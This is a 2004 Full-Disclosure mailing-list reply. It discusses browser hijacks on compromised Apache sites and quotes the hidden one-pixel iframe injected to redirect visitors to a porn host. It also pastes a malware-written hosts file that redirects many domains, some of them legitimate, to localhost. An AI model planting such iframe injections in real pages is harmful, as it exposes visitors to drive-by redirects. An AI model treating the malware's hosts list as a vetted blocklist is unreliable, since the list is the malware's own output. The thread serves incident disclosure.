Hello Flibert, I keep watching my auto-patching XP Home junk-box getting done with techniques like this, while some rarely-patched XP Pros that I look in, on, aren't.
I don't care anough about my junk machine to lock it down, but the number of these browser hijacks is a bit much .. the last one wast cute .. it did this to hosts .. (I think it felt sympathetic); 127.0.0.1 ruworld.com 127.0.0.1 69.50.170.125 127.0.0.1 213.159.118.226 127.0.0.1 63.219.178.91 127.0.0.1 63.219.181.7 127.0.0.1 maxxxhosters.com 127.0.0.1 64.237.46.147 127.0.0.1 therealsearch.com 127.0.0.1 213.159.117.236 127.0.0.1 thumbest-traffic.com 127.0.0.1 600pics.com 127.0.0.1 tonser.4-counter.com 127.0.0.1 66.230.145.49 127.0.0.1 free.sinpussy.com 127.0.0.1 hightcalldialer.com 127.0.0.1 bestpornnews.com 127.0.0.1 thumberland.com 127.0.0.1 greg-search.com 127.0.0.1 connect.online-dialer.com 127.0.0.1 0190-dialer.com 127.0.0.1 approvedlinks.com 127.0.0.1 install.xxxtoolbar.com 127.0.0.1 download.buxomatic.com 127.0.0.1 dia.4-counter.com 127.0.0.1 vse-moe.biz 127.0.0.1 crue.global-counter.com 127.0.0.1 line-plus.com 127.0.0.1 porno-links.biz 127.0.0.1 download.tntdialer.com 127.0.0.1 freelivesex.org 127.0.0.1 free3xmatures.com 127.0.0.1 bestpics.net 127.0.0.1 dikai.com 127.0.0.1 world-search.biz 127.0.0.1 1-se.com 127.0.0.1 58q.com 127.0.0.1 aifind.cc 127.0.0.1 aifind.info 127.0.0.1 allneedsearch.com 127.0.0.1 auto.ie.searchforge.com 127.0.0.1 awebfind.biz 127.0.0.1 best.royalsearch.net 127.0.0.1 cracks.am 127.0.0.1 default-homepage-network.com 127.0.0.1 find.microgirls.com 127.0.0.1 find4u.net 127.0.0.1 freshvideogals.com 127.0.0.1 i-lookup.com 127.0.0.1 ie-search.com 127.0.0.1 in.webcounter.cc 127.0.0.1 itseasy.us 127.0.0.1 just.find-itnow.com 127.0.0.1 link.startmake.com 127.0.0.1 mysearchnow.com 127.0.0.1 nativehardcore.com 127.0.0.1 qwertysearch123.biz 127.0.0.1 search.ieplugin.com 127.0.0.1 search.psn.cn 127.0.0.1 searchbar.findthewebsiteyouneed.com 127.0.0.1 searchcentrix.com 127.0.0.1 searchmyrequest.com 127.0.0.1 super-spider.com 127.0.0.1 t.rack.cc 127.0.0.1 teen-biz.com 127.0.0.1 teenhqpics.com 127.0.0.1 tits.hardcore4ever.net 127.0.0.1 webcoolsearch.com 127.0.0.1 wmmse.com 127.0.0.1 008i.com 127.0.0.1 2fastsearch.net 127.0.0.1 8095.com 127.0.0.1 alfa-search.com 127.0.0.1 boredlife.com 127.0.0.1 couldnotfind.com 127.0.0.1 cracks.am 127.0.0.1 daum.net 127.0.0.1 dreamwiz.com 127.0.0.1 find-itnow.com 127.0.0.1 find4u.net 127.0.0.1 firstbookmark.com 127.0.0.1 gajai.com 127.0.0.1 hand-book.com 127.0.0.1 hao123.com 127.0.0.1 hotsearchbox.com 127.0.0.1 hotwebsearch.com 127.0.0.1 hugesearch.net 127.0.0.1 iquicksearch.com 127.0.0.1 lookfor.cc 127.0.0.1 naver.com 127.0.0.1 nkvd.us 127.0.0.1 novafuck.com 127.0.0.1 ohcorea.com 127.0.0.1 omega-search.com 127.0.0.1 onet.pl 127.0.0.1 power-search.info 127.0.0.1 rightfinder.net 127.0.0.1 search-1.net 127.0.0.1 search-and-go.com 127.0.0.1 search-dot.com 127.0.0.1 search-space.com 127.0.0.1 searchforge.com 127.0.0.1 searching-the-net.com 127.0.0.1 searchv.com 127.0.0.1 searchxl.com 127.0.0.1 seznam.cz 127.0.0.1 slotch.com 127.0.0.1 spidersearch.com 127.0.0.1 startium.com 127.0.0.1 ttjj.com 127.0.0.1 viewpornkey.com 127.0.0.1 wazzupnet.com 127.0.0.1 websearch.com 127.0.0.1 windowws.cc 127.0.0.1 xgmm.com 127.0.0.1 xwebsearch.biz 127.0.0.1 yourbookmarks.ws 127.0.0.1 www.ruworld.com 127.0.0.1 www.maxxxhosters.com 127.0.0.1 www.therealsearch.com 127.0.0.1 www.thumbest-traffic.com 127.0.0.1 www.600pics.com 127.0.0.1 www.hightcalldialer.com 127.0.0.1 www.bestpornnews.com 127.0.0.1 www.thumberland.com 127.0.0.1 www.greg-search.com 127.0.0.1 www.0190-dialer.com 127.0.0.1 www.approvedlinks.com 127.0.0.1 www.vse-moe.biz 127.0.0.1 www.line-plus.com 127.0.0.1 www.porno-links.biz 127.0.0.1 www.freelivesex.org 127.0.0.1 www.free3xmatures.com 127.0.0.1 www.bestpics.net 127.0.0.1 www.dikai.com 127.0.0.1 www.world-search.biz 127.0.0.1 www.1-se.com 127.0.0.1 www.58q.com 127.0.0.1 www.aifind.cc 127.0.0.1 www.aifind.info 127.0.0.1 www.allneedsearch.com 127.0.0.1 www.awebfind.biz 127.0.0.1 www.cracks.am 127.0.0.1 www.default-homepage-network.com 127.0.0.1 www.find4u.net 127.0.0.1 www.freshvideogals.com 127.0.0.1 www.i-lookup.com 127.0.0.1 www.ie-search.com 127.0.0.1 www.itseasy.us 127.0.0.1 www.mysearchnow.com 127.0.0.1 www.nativehardcore.com 127.0.0.1 www.qwertysearch123.biz 127.0.0.1 www.searchcentrix.com 127.0.0.1 www.searchmyrequest.com 127.0.0.1 www.super-spider.com 127.0.0.1 www.teen-biz.com 127.0.0.1 www.teenhqpics.com 127.0.0.1 www.webcoolsearch.com 127.0.0.1 www.wmmse.com 127.0.0.1 www.008i.com 127.0.0.1 www.2fastsearch.net 127.0.0.1 www.8095.com 127.0.0.1 www.alfa-search.com 127.0.0.1 www.boredlife.com 127.0.0.1 www.couldnotfind.com 127.0.0.1 www.cracks.am 127.0.0.1 www.daum.net 127.0.0.1 www.dreamwiz.com 127.0.0.1 www.find-itnow.com 127.0.0.1 www.find4u.net 127.0.0.1 www.firstbookmark.com 127.0.0.1 www.gajai.com 127.0.0.1 www.hand-book.com 127.0.0.1 www.hao123.com 127.0.0.1 www.hotsearchbox.com 127.0.0.1 www.hotwebsearch.com 127.0.0.1 www.hugesearch.net 127.0.0.1 www.iquicksearch.com 127.0.0.1 www.lookfor.cc 127.0.0.1 www.naver.com 127.0.0.1 www.nkvd.us 127.0.0.1 www.novafuck.com 127.0.0.1 www.ohcorea.com 127.0.0.1 www.omega-search.com 127.0.0.1 www.onet.pl 127.0.0.1 www.power-search.info 127.0.0.1 www.rightfinder.net 127.0.0.1 www.search-1.net 127.0.0.1 www.search-and-go.com 127.0.0.1 www.search-dot.com 127.0.0.1 www.search-space.com 127.0.0.1 www.searchforge.com 127.0.0.1 www.searching-the-net.com 127.0.0.1 www.searchv.com 127.0.0.1 www.searchxl.com 127.0.0.1 www.seznam.cz 127.0.0.1 www.slotch.com 127.0.0.1 www.spidersearch.com 127.0.0.1 www.startium.com 127.0.0.1 www.ttjj.com 127.0.0.1 www.viewpornkey.com 127.0.0.1 www.wazzupnet.com 127.0.0.1 www.websearch.com 127.0.0.1 www.windowws.cc 127.0.0.1 www.xgmm.com 127.0.0.1 www.xwebsearch.biz 127.0.0.1 www.yourbookmarks.ws I haven't been through your posted site .. but maybe (a little randomly) that list is relevant .. ----- Original Message ----- >From: "Filbert" <[EMAIL PROTECTED]> >To: <[EMAIL PROTECTED]> >Subject: [Full-Disclosure] browser hijack by apache sites >Date: Sun, 23 May 2004 15:19:30 +0200 > > Hi, > > This is the second time this weekend that I've been warned of an apache site > on a Linux server were a line of code was added to redirect browsers to porn > sites. > First was the site of a Belgian political party. Second came today, and as of > writing this it's still there. The admin was informed so it can be gone soon. > > hxxp://www.previsit.com/carrefour/nl/ <- hxxp must changed to http > IE users do NOT click. > > the code added at the bottom is: > > <iframe SRC="http://www.b00gle.com/fa/?d=get"; WIDTH=1 > HEIGHT=1></iframe></body> > > anyone seen this before? What vulnerability is exploited here? FP? > > Thx, > Filb. > > -- > echo "[EMAIL PROTECTED]@linuxmail.org" | sed 's/+++ATH0//g' > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > -- Ian Latter Internet and Networking Security Officer Macquarie University _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
